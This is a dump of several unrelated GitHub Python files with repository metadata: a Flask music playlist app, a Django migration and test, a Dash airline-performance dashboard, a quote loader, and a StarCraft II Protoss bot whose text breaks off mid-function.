1c0f2a09e34cbf67a520672d0823b61ead985d30 | 2f1e5da4025bd163eb62c8606d293a391476a8c4 | /HelloWorld/operators.py | 5b9645cd7afc7317899264c45fe0c5854d7d38df | [] | no_license | jtbutler31/python-code | 1a615d07c51e3e88790fd97b214399f242f8bceb | 8e52a2b73a1faeb61eadc126d9027ca5ad38f6c0 | refs/heads/main | 2023-03-06T01:06:56.169765 | 2021-02-16T23:07:03 | 2021-02-16T23:07:03 | 339,555,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | a = 12
# Demonstrate Python arithmetic operators on `a` (defined above) and `b`.
b = 3
print(a +b)   # addition
print(a-b)    # subtraction
print(a*b)    # multiplication
print(a/b)    # true division (float result)
print(a//b)   # floor division
print(a%b)    # modulo (remainder)
print()
# Print 1 .. (a//b - 1); range's upper bound is exclusive.
for i in range(1, a//b):
    print(i)
# Manual equivalent of the loop above, reassigning `i` each time.
i=1
print(i)
i=2
print(i)
i=3
print(i)
"noreply@github.com"
] | jtbutler31.noreply@github.com |
a6923463ee15fcf20bb4036e303685d1595d052c | be6739c9689f2a749d82c608efc24460907f730c | /ftp2/util/utils.py | 469e460b88bd2dd71853437d27cc1cda847d6bae | [] | no_license | kerry-gu/TProject | 1fb9ec9542bce30779aa52f854078d82c849a44f | 78c4de6454b13c00e17e49a350ae85aa2edb89f5 | refs/heads/main | 2023-04-24T02:11:59.162466 | 2021-05-16T11:32:58 | 2021-05-16T11:32:58 | 311,251,917 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | class utils:
def dealCookie(json, mycookie):
keys = json.keys()
for key in keys:
mycookie.set_cookie(key, json[key]) | [
"549520210@qq.com"
] | 549520210@qq.com |
6251e005cdf4607a044a2a2d90ee2905b03094f4 | 81e7e1d6e3603a7815f1bd29b67d21ac3107fe0d | /app.py | 5e127f84317eabe06791d9137511057799375d97 | [] | no_license | ariesdaboy/playlistmp3 | aa803e57a0e2675e5b516cbbdff90d9e9ff43937 | d554a5ce8c27114c2b47e5a92adf8f9b221cd378 | refs/heads/main | 2023-06-19T11:15:18.668860 | 2021-07-15T22:33:47 | 2021-07-15T22:33:47 | 386,406,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,778 | py | from flask import Flask, render_template, request, redirect
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///musicas.sqlite3'
db = SQLAlchemy(app)
class Musica (db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
nome = db.Column(db.String(150), nullable = False)
artista = db.Column (db.String(150), nullable = False)
link = db.Column(db.String(300), nullable = False)
def __init__(self, nome, artista, link):
self.nome = nome
self.artista = artista
self.link = link
@app.route('/')
def index():
musicas = Musica.query.all()
return render_template('index.html', musicas=musicas)
@app.route('/new', methods=['GET', 'POST'])
def new():
if request.method == 'POST':
musica = Musica (
request.form['nome'],
request.form['artista'],
request.form['link'],
)
db.session.add(musica)
db.session.commit()
return redirect ('/#playlist')
return render_template('new.html')
@app.route('/edit/<id>', methods=['GET', 'POST'])
def edit(id):
musica = Musica.query.get(id)
if request.method == "POST":
musica.nome = request.form['nome']
musica.artista = request.form['artista']
musica.link = request.form['link']
db.session.commit()
return redirect ('/#playlist')
return render_template('edit.html', musica=musica)
@app.route('/delete/<id>')
def delete(id):
musica = Musica.query.get(id)
db.session.delete(musica)
db.session.commit()
return redirect ('/#playlist')
if __name__ == '__main__':
db.create_all()
app.run(debug=True)
| [
"noreply@github.com"
] | ariesdaboy.noreply@github.com |
99fd7acd8087f799bf7d79996920d54f206498f5 | 8ae38b718deafb5d7015f793240dd37d7cd4ea6f | /base/migrations/0002_order_orderitem_review_shippingaddress.py | c70b5ccc0b49e72c87b89ac630a36ddf5e8fa4fd | [] | no_license | trungpnt/delectrons-django-reactjs | 5fa840535e3294b08c54a8edc73e3c04cf8530f6 | 025843434d831822bd8d24476177b075ada76452 | refs/heads/master | 2023-05-15T04:34:52.753378 | 2021-06-08T01:15:43 | 2021-06-08T01:15:43 | 374,842,282 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,741 | py | # Generated by Django 3.1.4 on 2020-12-24 01:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: adds the Order, ShippingAddress, Review
    and OrderItem models (all columns nullable/blank, SET_NULL or CASCADE
    links back to the user, product and order tables)."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('base', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Order',
            fields=[
                ('paymentMethod', models.CharField(blank=True, max_length=200, null=True)),
                ('taxPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
                ('shippingPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
                ('totalPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
                ('isPaid', models.BooleanField(default=False)),
                ('paidAt', models.DateTimeField(blank=True, null=True)),
                ('isDelivered', models.BooleanField(default=False)),
                ('deliveredAt', models.DateTimeField(blank=True, null=True)),
                ('createdAt', models.DateTimeField(auto_now_add=True)),
                ('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='ShippingAddress',
            fields=[
                ('address', models.CharField(blank=True, max_length=200, null=True)),
                ('city', models.CharField(blank=True, max_length=200, null=True)),
                ('postalCode', models.CharField(blank=True, max_length=200, null=True)),
                ('country', models.CharField(blank=True, max_length=200, null=True)),
                ('shippingPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
                ('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
                ('order', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='base.order')),
            ],
        ),
        migrations.CreateModel(
            name='Review',
            fields=[
                ('name', models.CharField(blank=True, max_length=200, null=True)),
                ('rating', models.IntegerField(blank=True, default=0, null=True)),
                ('comment', models.TextField(blank=True, null=True)),
                ('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
                ('product', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='base.product')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='OrderItem',
            fields=[
                ('name', models.CharField(blank=True, max_length=200, null=True)),
                ('qty', models.IntegerField(blank=True, default=0, null=True)),
                ('price', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
                ('image', models.CharField(blank=True, max_length=200, null=True)),
                ('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
                ('order', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='base.order')),
                ('product', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='base.product')),
            ],
        ),
    ]
| [
"trungpnt0605@gmail.com"
] | trungpnt0605@gmail.com |
7b90e48776cb5ed1906723a385865f67f4255930 | 08c3c91ed4b25ef357de275333576de8e045df67 | /src/rockman/todo/tests.py | 220f7a36c09fbb3296f46c52048a39d8522ab3f4 | [
"MIT"
] | permissive | rockmans/personal-website | 39f50153836c49b547f9d133612be5e4be3d334f | 093ef59db2e5a248b817884355804ba0a405adad | refs/heads/master | 2020-04-10T18:51:16.690607 | 2016-06-01T16:43:51 | 2016-06-01T16:43:51 | 30,776,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | from django.test import TestCase
from rockman.todo.models import Todo
from datetime import datetime
class TodoTestCase(TestCase):
    """Smoke test for the Todo model: create one row, read it back via the ORM."""
    def setUp(self):
        # One Todo row per test to query against.
        due_date = datetime.now()
        Todo.objects.create(task="Make test.", category="House", assignee="Emily", due=due_date)
    def test_return_tasks(self):
        """Placeholder test case to get the testing pipeline up and running."""
        todo_task = Todo.objects.get(assignee="Emily")
        self.assertEqual(todo_task.task, 'Make test.')
| [
"ebuschang@gmail.com"
] | ebuschang@gmail.com |
dbe474c564414f43e0516ca3ee5aae0b9a163e11 | 3f6ab15b90bf23e5a5cc0a203e876f1caa32b023 | /dash12.py | e914edd85b71d5f61e22e88f2d021a9daf589e1b | [] | no_license | vivinandlin/0630 | 0fff3775176893b2bdc221a4c814256981b26885 | c8970fbc30388507b1a239c5c3489a504e1fdb29 | refs/heads/main | 2023-06-05T20:40:32.358286 | 2021-06-30T10:29:54 | 2021-06-30T10:29:54 | 381,614,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,997 | py | # -*- coding: utf-8 -*-
"""Untitled13.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/11vbtKr83jQ2P9cCz320AMJBZAMIx5_df
"""
# Import required libraries
import pandas as pd
import dash
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output, State
import plotly.graph_objects as go
import plotly.express as px
#from dash import no_update
# Create a dash application
app = dash.Dash(__name__)
# REVIEW1: Clear the layout and do not display exception till callback gets executed
app.config.suppress_callback_exceptions = True
# Read the airline data into pandas dataframe.
# NOTE(review): fetched over HTTP at import time — app start-up fails offline.
airline_data = pd.read_csv('https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DV0101EN-SkillsNetwork/Data%20Files/airline_data.csv',
                           encoding = "ISO-8859-1",
                           dtype={'Div1Airport': str, 'Div1TailNum': str,
                                  'Div2Airport': str, 'Div2TailNum': str})
# Years selectable in the report dropdown (2005..2020 inclusive)
year_list = [i for i in range(2005, 2021, 1)]
"""Compute graph data for creating yearly airline performance report
Function that takes airline data as input and create 5 dataframes based on the grouping condition to be used for plottling charts and grphs.
Argument:
df: Filtered dataframe
Returns:
Dataframes to create graph.
"""
def compute_data_choice_1(df):
    """Build the five dataframes behind the yearly airline performance report.

    Args:
        df: Flight records already filtered to a single year.

    Returns:
        Tuple ``(bar_data, line_data, div_data, map_data, tree_data)``:
        monthly cancellations per category, mean air time per airline per
        month, rows with diverted landings, flight totals per origin state,
        and flight totals per destination state per airline.
    """
    # Flights cancelled each month, split by cancellation category.
    monthly_cancellations = (
        df.groupby(['Month', 'CancellationCode'])['Flights'].sum().reset_index()
    )
    # Mean air time per reporting airline, month by month.
    airtime_by_airline = (
        df.groupby(['Month', 'Reporting_Airline'])['AirTime'].mean().reset_index()
    )
    # Keep only flights that actually had a diverted airport landing.
    diverted_flights = df[df['DivAirportLandings'] != 0.0]
    # Total flights leaving each origin state.
    flights_by_origin = df.groupby(['OriginState'])['Flights'].sum().reset_index()
    # Total flights into each destination state, per airline.
    flights_by_destination = (
        df.groupby(['DestState', 'Reporting_Airline'])['Flights'].sum().reset_index()
    )
    return (monthly_cancellations, airtime_by_airline, diverted_flights,
            flights_by_origin, flights_by_destination)
"""Compute graph data for creating yearly airline delay report
This function takes in airline data and selected year as an input and performs computation for creating charts and plots.
Arguments:
df: Input airline data.
Returns:
Computed average dataframes for carrier delay, weather delay, NAS delay, security delay, and late aircraft delay.
"""
def compute_data_choice_2(df):
    """Compute the monthly average delay dataframes for the yearly delay report.

    Args:
        df: Flight records already filtered to a single year.

    Returns:
        Tuple of five dataframes — average carrier, weather, NAS, security,
        and late-aircraft delay per reporting airline per month.
    """
    def _monthly_mean(column):
        # Average one delay column per (Month, Reporting_Airline) pair.
        return df.groupby(['Month', 'Reporting_Airline'])[column].mean().reset_index()

    return (_monthly_mean('CarrierDelay'),
            _monthly_mean('WeatherDelay'),
            _monthly_mean('NASDelay'),
            _monthly_mean('SecurityDelay'),
            _monthly_mean('LateAircraftDelay'))
# Application layout: a title, two dropdowns (report type + year), and five
# empty divisions (plot1..plot5) that the callback fills with dcc.Graph objects.
app.layout = html.Div(children=[
    # TASK1: Add title to the dashboard
    html.H2('US Domestic Airline Flights Performance',style={'textAlign':'center','color':'#503d36','font-size':25}),
    # REVIEW2: Dropdown creation
    # Outer division holding both dropdown rows
    html.Div([
        # Row 1: report-type selector
        html.Div([
            # Helper label for the report-type dropdown
            html.Div(
                [
                    html.H2('Report Type:', style={'margin-right': '2em'}),
                ]
            ),
            # TASK2: Add a dropdown
            dcc.Dropdown(id='input-type',
                         # OPT1 = performance report, OPT2 = delay report
                         options=[{'label': 'Yearly Airline performance', 'value':'OPT1'},{'label':'Yearly Airline Delay Report','value':'OPT2'}],
                         placeholder="Select a report type",
                         style={'width':'80%', 'padding':'3px', 'font-size': '20px', 'text-align-last' : 'center'}),
            # Label and dropdown side by side via flex display
        ], style={'display':'flex'}),
        # Row 2: year selector
        html.Div([
            # Helper label for the year dropdown
            html.Div(
                [
                    html.H2('Choose Year:', style={'margin-right': '2em'})
                ]
            ),
            dcc.Dropdown(id='input-year',
                         # One option per year in year_list (2005..2020)
                         options=[{'label': i, 'value': i} for i in year_list],
                         placeholder="Select a year",
                         style={'width':'80%', 'padding':'3px', 'font-size': '20px', 'text-align-last' : 'center'}),
            # Label and dropdown side by side via flex display
        ], style={'display': 'flex'}),
    ]),
    # Computed graphs
    # REVIEW3: Empty divisions whose ids are targeted by the callback outputs
    html.Div([ ], id='plot1'),
    html.Div([
        html.Div([ ], id='plot2'),
        html.Div([ ], id='plot3')
    ], style={'display': 'flex'}),
    # TASK3: Second row of two empty plot divisions
    html.Div([
        html.Div([ ], id='plot4'),
        html.Div([ ], id='plot5')
    ], style={'display': 'flex'})
])
# Callback wiring (TASK4): the two dropdown Inputs drive the five plot
# divisions; the five State arguments let us hand back the current contents
# untouched until the user has picked both values (REVIEW4).
@app.callback( [Output(component_id='plot1', component_property='children'),
                Output(component_id='plot2', component_property='children'),
                Output(component_id='plot3', component_property='children'),
                Output(component_id='plot4', component_property='children'),
                Output(component_id='plot5', component_property='children')],
               [Input(component_id='input-type', component_property='value'),
                Input(component_id='input-year', component_property='value')],
               [State("plot1", 'children'), State("plot2", "children"),
                State("plot3", "children"), State("plot4", "children"),
                State("plot5", "children")
                ])
def get_graph(chart, year, children1, children2, c3, c4, c5):
    """Render the five report graphs for the chosen report type and year.

    Args:
        chart: 'OPT1' (yearly performance report) or 'OPT2' (delay report).
        year: Year selected in the dropdown.
        children1..c5: Current children of the five plot divisions; returned
            unchanged while either dropdown is still unset.

    Returns:
        List of five children components for plot1..plot5.
    """
    # BUGFIX: the callback also fires on page load with both values None;
    # int(None) used to raise. Keep the current contents until both are set.
    if chart is None or year is None:
        return [children1, children2, c3, c4, c5]

    # Restrict the data to the selected year.
    df = airline_data[airline_data['Year'] == int(year)]

    if chart == 'OPT1':
        # Yearly airline performance report.
        bar_data, line_data, div_data, map_data, tree_data = compute_data_choice_1(df)

        # Number of flights under different cancellation categories.
        bar_fig = px.bar(bar_data, x='Month', y='Flights', color='CancellationCode', title='Monthly Flight Cancellation')

        # TASK5 / BUGFIX: average flight time by reporting airline was never
        # built, so the `line_fig` reference below raised NameError.
        line_fig = px.line(line_data, x='Month', y='AirTime', color='Reporting_Airline', title='Average monthly flight time (minutes) by airline')

        # Percentage of diverted airport landings per reporting airline.
        pie_fig = px.pie(div_data, values='Flights', names='Reporting_Airline', title='% of flights by reporting airline')

        # REVIEW5: Number of flights flying from each state using choropleth.
        map_fig = px.choropleth(map_data,  # Input data
                                locations='OriginState',
                                color='Flights',
                                hover_data=['OriginState', 'Flights'],
                                locationmode='USA-states',  # Plot as US states
                                color_continuous_scale='GnBu',
                                range_color=[0, map_data['Flights'].max()])
        map_fig.update_layout(
            title_text='Number of flights from origin state',
            geo_scope='usa')  # Plot only the USA instead of the globe

        # TASK6: Number of flights flying to each state from each reporting airline.
        tree_fig = px.treemap(tree_data, path=['DestState', 'Reporting_Airline'], values='Flights', color='Flights', color_continuous_scale='RdBu', title='Flight count by airline to destination state')

        # REVIEW6: Return dcc.Graph components into the five empty divisions.
        return [dcc.Graph(figure=tree_fig),
                dcc.Graph(figure=pie_fig),
                dcc.Graph(figure=map_fig),
                dcc.Graph(figure=bar_fig),
                dcc.Graph(figure=line_fig)
                ]
    else:
        # REVIEW7: Yearly airline delay report.
        avg_car, avg_weather, avg_NAS, avg_sec, avg_late = compute_data_choice_2(df)

        # One line chart per delay category ("carrier" typo in title fixed).
        carrier_fig = px.line(avg_car, x='Month', y='CarrierDelay', color='Reporting_Airline', title='Average carrier delay time (minutes) by airline')
        weather_fig = px.line(avg_weather, x='Month', y='WeatherDelay', color='Reporting_Airline', title='Average weather delay time (minutes) by airline')
        nas_fig = px.line(avg_NAS, x='Month', y='NASDelay', color='Reporting_Airline', title='Average NAS delay time (minutes) by airline')
        sec_fig = px.line(avg_sec, x='Month', y='SecurityDelay', color='Reporting_Airline', title='Average security delay time (minutes) by airline')
        late_fig = px.line(avg_late, x='Month', y='LateAircraftDelay', color='Reporting_Airline', title='Average late aircraft delay time (minutes) by airline')

        return [dcc.Graph(figure=carrier_fig),
                dcc.Graph(figure=weather_fig),
                dcc.Graph(figure=nas_fig),
                dcc.Graph(figure=sec_fig),
                dcc.Graph(figure=late_fig)]
# Run the app
if __name__ == '__main__':
app.run_server(debug=True) | [
"noreply@github.com"
] | vivinandlin.noreply@github.com |
feea70d9fcfd418dfd3af9a5b19202c181470c63 | bdd3516822715bff32c6be4d57f9af9abfa269dc | /src/quote.py | 062f67437562637958464e9619ddcfaffe3350e0 | [] | no_license | permag/testing_a2 | 404936fbaa47f39c488396e26e80aaca5be9c683 | 5465832ee60d9eb662782c1a64a09dc017e950bc | refs/heads/master | 2021-01-25T04:03:07.000522 | 2014-01-06T18:08:16 | 2014-01-06T18:08:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,088 | py | # -*- coding: utf-8 -*-
import sys, json, random
class Quote:
    """Serves quotes from a JSON data file in a random order."""

    def __init__(self):
        # Cursor sits before the first quote; get_next() advances it first.
        self.current = -1
        self.quotes_data = []
        self.quote_count = 0
        # Load the file and shuffle once; count is cached for callers.
        self.quotes_data = self.get_shuffle_data(self.get_data())
        self.quote_count = len(self.quotes_data)

    def get_data(self, file_path=None):
        """Load and return the quote list from *file_path* (default src/data.json).

        IOError from a missing/unreadable file propagates to the caller.
        """
        path = file_path if file_path else 'src/data.json'
        with open(path) as handle:
            return json.load(handle)

    def get_shuffle_data(self, data):
        """Shuffle *data* in place and return it; reject an empty payload."""
        if not data:
            raise Exception('No data.')
        random.shuffle(data)
        return data

    def get_next(self):
        """Advance the cursor and return the next quote.

        Returns a dict {'quote': str, 'author': [bytes, ...]} — the values are
        UTF-8 encoded (Python-2-era convention kept for compatibility).
        """
        self.current += 1
        entry = self.quotes_data[self.current]
        authors = [str(name).encode('utf-8') for name in entry['author']]
        return {'quote': str(entry['quote'].encode('utf-8')),
                'author': authors}
| [
"killingfloor00@gmail.com"
] | killingfloor00@gmail.com |
1e77fbaa5f0a74d683e6ac5aff6046ee957f0331 | 801fd0692068c8950ff1f06eec22d94bcca0ab01 | /Sentinel/sentinel.py | 9ca87bf50e3e6611ac592c6d355c1b1076e83f99 | [] | no_license | 0MNIP0TENT/Sentinel-Starcraft2-Bot | f42de38cbc51e79cf493ed6bb039e20ae2f989e4 | 3116edf7ffa923027dd19684f898d83ac8f62295 | refs/heads/master | 2020-04-19T07:58:46.113176 | 2019-01-29T01:08:08 | 2019-01-29T01:08:08 | 168,063,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,646 | py | import sc2
from sc2 import run_game, maps, Race, Difficulty, position
from sc2.position import Point2
from sc2.player import Bot, Computer
from sc2.constants import NEXUS, PROBE, PYLON, ROBOTICSFACILITY, ASSIMILATOR, GATEWAY, \
CYBERNETICSCORE, STALKER, IMMORTAL,STARGATE, VOIDRAY, ZEALOT, FORGE, PHOTONCANNON, \
STARGATE, FLEETBEACON, VOIDRAY, CARRIER, SENTRY, PROTOSSAIRWEAPONSLEVEL1, \
PROTOSSAIRARMORSLEVEL1
import random
from random import randint
from operator import or_
from sc2.constants import *
class Sentinel(sc2.BotAI):
    """Protoss bot: expands, teches to air (void rays + carriers), researches
    air upgrades, patrols its bases and attacks with its fleet."""

    def __init__(self):
        # One flag per air upgrade so each research is only queued once.
        self.air_weapon1_started = False
        self.air_weapon2_started = False
        self.air_weapon3_started = False
        self.air_armor1_started = False
        self.air_armor2_started = False
        self.air_armor3_started = False

    async def on_step(self, iteration):
        """Per-frame loop: economy first, then production, then combat."""
        await self.distribute_workers()
        await self.expand()
        await self.build_workers()
        await self.build_buildings()
        await self.build_army()
        await self.upgrade_air()
        await self.patrol(iteration)
        await self.attack()
        await self.scout()

    async def scout(self):
        """Late game: send a zealot to an enemy start location to find stragglers."""
        if self.supply_used >= 190:
            if not self.units(ZEALOT).ready.exists:
                for gateway in self.units(GATEWAY).ready.noqueue:
                    if self.can_afford(ZEALOT):
                        await self.do(gateway.train(ZEALOT))
            if self.units(ZEALOT).ready.exists:
                scout = self.units(ZEALOT).first
                if scout.is_idle:
                    await self.do(scout.attack(random.choice(self.enemy_start_locations)))

    async def expand(self):
        """Take up to four bases as supply milestones are reached."""
        if self.units(NEXUS).amount < 2 and self.can_afford(NEXUS) and not self.already_pending(NEXUS):
            await self.expand_now()
        if self.supply_used > 80 and self.units(NEXUS).amount < 3 and self.can_afford(NEXUS) and not self.already_pending(NEXUS):
            await self.expand_now()
        if self.supply_used > 120 and self.units(NEXUS).amount < 4 and self.can_afford(NEXUS) and not self.already_pending(NEXUS):
            await self.expand_now()

    async def build_workers(self):
        """Train probes up to 16 per nexus."""
        if (len(self.units(NEXUS)) * 16) > len(self.units(PROBE)):
            for nexus in self.units(NEXUS).ready.noqueue:
                if self.can_afford(PROBE) and not self.already_pending(PROBE):
                    await self.do(nexus.train(PROBE))

    async def build_buildings(self):
        """Run the whole construction pipeline (cannons/robotics disabled)."""
        await self.build_pylons()
        await self.build_assimilators()
        await self.build_gateways()
        await self.build_ccore()
        # build photon cannons
        #await self.build_cannons()
        await self.build_stargates()
        await self.build_fleet_beacon()
        #build robotics facility
        #await self.build_robotics_facility()

    async def build_pylons(self):
        """Add a pylon near a nexus whenever supply headroom drops below 10."""
        if self.supply_left < 10 and not self.supply_cap == 200:
            nexuses = self.units(NEXUS).ready
            if nexuses.exists:
                if self.can_afford(PYLON):
                    # if self.units(PYLON).amount < 1:
                    #     await self.build(PYLON, self.main_base_ramp.top_center)
                    # else:
                    await self.build(PYLON, near=nexuses.first)

    async def build_assimilators(self):
        """Take every vespene geyser within 15 of an owned nexus."""
        for nexus in self.units(NEXUS).ready:
            vaspenes = self.state.vespene_geyser.closer_than(15.0, nexus)
            for vaspene in vaspenes:
                if not self.can_afford(ASSIMILATOR) and not self.already_pending(ASSIMILATOR):
                    break
                worker = self.select_build_worker(vaspene.position)
                if worker is None:
                    break
                if not self.units(ASSIMILATOR).closer_than(1.0, vaspene).exists:
                    await self.do(worker.build(ASSIMILATOR, vaspene))

    async def build_gateways(self):
        """Build a single gateway (only needed as a tech prerequisite)."""
        if self.units(GATEWAY).amount < 1:
            if self.can_afford(GATEWAY) and not self.already_pending(GATEWAY):
                if self.units(PYLON).ready.exists:
                    pylon = self.units(PYLON).random
                    await self.build(GATEWAY, near=pylon)

    async def build_ccore(self):
        """Build the cybernetics core once a gateway is finished."""
        if self.units(GATEWAY).ready.exists and not self.units(CYBERNETICSCORE):
            if self.can_afford(CYBERNETICSCORE) and not self.already_pending(CYBERNETICSCORE):
                pylon = self.units(PYLON).random
                await self.build(CYBERNETICSCORE, near=pylon)

    async def build_stargates(self):
        """Scale stargate count with fleet size: 2 -> 3 -> up to 7 at max supply."""
        if self.units(CYBERNETICSCORE).ready.exists:
            if self.can_afford(STARGATE) and self.units(STARGATE).amount < 2:
                pylon = self.units(PYLON).random
                await self.build(STARGATE, near=pylon)
            elif self.units(VOIDRAY).amount + self.units(CARRIER).amount > 3 and self.units(STARGATE).amount < 3:
                pylon = self.units(PYLON).ready.random
                await self.build(STARGATE, near=pylon)
            elif self.supply_used > 195 and self.units(STARGATE).amount < 7:
                pylon = self.units(PYLON).random
                await self.build(STARGATE, near=pylon)

    async def build_fleet_beacon(self):
        """Build the fleet beacon (carrier tech) as soon as possible."""
        if not self.units(FLEETBEACON).ready.exists and not self.already_pending(FLEETBEACON):
            if self.units(PYLON).ready.exists:
                pylon = self.units(PYLON).ready.random
                await self.build(FLEETBEACON, near=pylon)

    async def build_forge(self):
        """Build one forge (cannon prerequisite; only used by build_cannons)."""
        if self.units(FORGE).amount < 1 and self.can_afford(FORGE):
            if not self.already_pending(FORGE):
                pylon = self.units(PYLON).random
                await self.build(FORGE, near=pylon)

    async def build_robotics_facility(self):
        """Build up to three robotics facilities (currently disabled upstream)."""
        if self.units(CYBERNETICSCORE).ready.exists:
            if self.units(ROBOTICSFACILITY).amount < 3 and not self.already_pending(ROBOTICSFACILITY):
                if self.can_afford(ROBOTICSFACILITY):
                    pylon = self.units(PYLON).random
                    await self.build(ROBOTICSFACILITY, near=pylon)

    async def build_cannons(self):
        """Spread up to 20 photon cannons near pylons (currently disabled upstream)."""
        await self.build_forge()
        if self.units(PYLON).ready.exists and self.units(PHOTONCANNON).amount < 20:
            pylon = self.units(PYLON).random
            await self.build(PHOTONCANNON, near=pylon)

    async def build_army(self):
        """Run the training pipeline (ground army mostly disabled)."""
        await self.train_zealots()
        #await self.train_sentrys()
        #await self.train_stalkers()
        #await self.train_immortals()
        await self.train_voidrays()
        await self.train_carriers()

    async def train_zealots(self):
        """Train zealots only before air tech is up (early defence / scout stock)."""
        if not self.units(FLEETBEACON).ready.exists:
            for gateway in self.units(GATEWAY).ready.noqueue:
                if self.can_afford(ZEALOT):
                    await self.do(gateway.train(ZEALOT))

    async def train_sentrys(self):
        """Keep about one sentry per five stalkers (unused in current build order)."""
        for gateway in self.units(GATEWAY).ready.noqueue:
            if self.can_afford(SENTRY) and self.units(CYBERNETICSCORE).ready.exists:
                if self.units(SENTRY).amount <= self.units(STALKER).amount / 5:
                    await self.do(gateway.train(SENTRY))

    async def train_stalkers(self):
        """Train stalkers until air tech is up (unused in current build order)."""
        if not self.units(FLEETBEACON).ready:
            for gateway in self.units(GATEWAY).ready.noqueue:
                if self.can_afford(STALKER):
                    await self.do(gateway.train(STALKER))

    async def train_immortals(self):
        """Train immortals from every robotics facility (unused in current build order)."""
        if self.units(ROBOTICSFACILITY).ready.exists:
            for robofac in self.units(ROBOTICSFACILITY):
                if self.can_afford(IMMORTAL):
                    await self.do(robofac.train(IMMORTAL))

    async def train_voidrays(self):
        """Train void rays; once the fleet beacon is up, cap them at 3x carriers."""
        for stargates in self.units(STARGATE).ready.noqueue:
            if self.units(FLEETBEACON).ready.exists:
                if self.units(VOIDRAY).amount < self.units(CARRIER).amount * 3:
                    if self.can_afford(VOIDRAY):
                        await self.do(stargates.train(VOIDRAY))
            else:
                if self.can_afford(VOIDRAY):
                    await self.do(stargates.train(VOIDRAY))

    async def train_carriers(self):
        """Train carriers from every idle stargate once the fleet beacon is done."""
        if self.units(FLEETBEACON).ready.exists:
            for stargate in self.units(STARGATE).ready.noqueue:
                if self.can_afford(CARRIER):
                    await self.do(stargate.train(CARRIER))

    def find_target(self, state):
        """Pick a target: visible unit, then visible structure, then a start location."""
        if len(self.known_enemy_units) > 0:
            return random.choice(self.known_enemy_units)
        elif len(self.known_enemy_structures) > 0:
            return random.choice(self.known_enemy_structures)
        else:
            # for one opponent:
            #return self.enemy_start_locations[0]
            # for multiple opponents:
            return random.choice(self.enemy_start_locations)

    async def patrol(self, iteration):
        """Early/mid game: shuffle the idle fleet around our bases and engage
        anything that wanders into attack range."""
        enemys = self.known_enemy_units
        if self.units(NEXUS).amount > 1 and self.supply_used < 150:
            if iteration % 20 == 0:
                forces = self.units(VOIDRAY).ready.idle | self.units(CARRIER).ready.idle | self.units(ZEALOT).ready.idle
                orders = []
                bases = self.units(NEXUS)
                for unit in forces:
                    # queue a move towards a random spot in front of each base
                    for base in bases:
                        destination = randint(4, 15)
                        pos = base.position.to2.towards(self.game_info.map_center, destination)
                        orders.append(unit.move(pos))
                await self.do_actions(orders)
            if enemys.exists:
                # BUGFIX: was `forces = forces = ...` (duplicated assignment).
                forces = self.units(VOIDRAY).ready.idle | self.units(CARRIER).ready.idle
                for unit in forces:
                    enemys_in_range = enemys.in_attack_range_of(unit)
                    if enemys_in_range.exists:
                        # BUGFIX: these coroutines were never awaited, so the
                        # stop/attack orders were silently dropped.
                        await self.do(unit.stop())
                        target = enemys_in_range.random
                        await self.do(unit.attack(target))

    async def attack(self):
        """Dispatch per-unit-type attack behaviours."""
        #target = self.find_target(self.state)
        await self.zealot_attack()
        await self.sentry_attack()
        await self.stalker_attack()
        await self.immortal_attack()
        await self.voidray_attack()
        await self.carrier_attack()

    async def zealot_attack(self):
        """Send idle zealots at random visible enemies."""
        if len(self.known_enemy_units):
            for zealot in self.units(ZEALOT):
                if zealot.is_idle:
                    await self.do(zealot.attack(random.choice(self.known_enemy_units)))

    async def sentry_attack(self):
        """Pop guardian shield when available, then attack with each sentry."""
        if len(self.known_enemy_units) > 0:
            for sentry in self.units(SENTRY):
                abilites = await self.get_available_abilities(sentry)
                if AbilityId.GUARDIANSHIELD_GUARDIANSHIELD in abilites:
                    await self.do(sentry(AbilityId.GUARDIANSHIELD_GUARDIANSHIELD))
                await self.do(sentry.attack(random.choice(self.known_enemy_units)))

    async def stalker_attack(self):
        """Send every stalker at a random visible enemy."""
        # if self.supply_used > 185:
        #     for stalker in self.units(STALKER).idle:
        #         await self.do(s.attack(self.find_target(self.state)))
        if len(self.known_enemy_units) > 0:
            for stalker in self.units(STALKER):
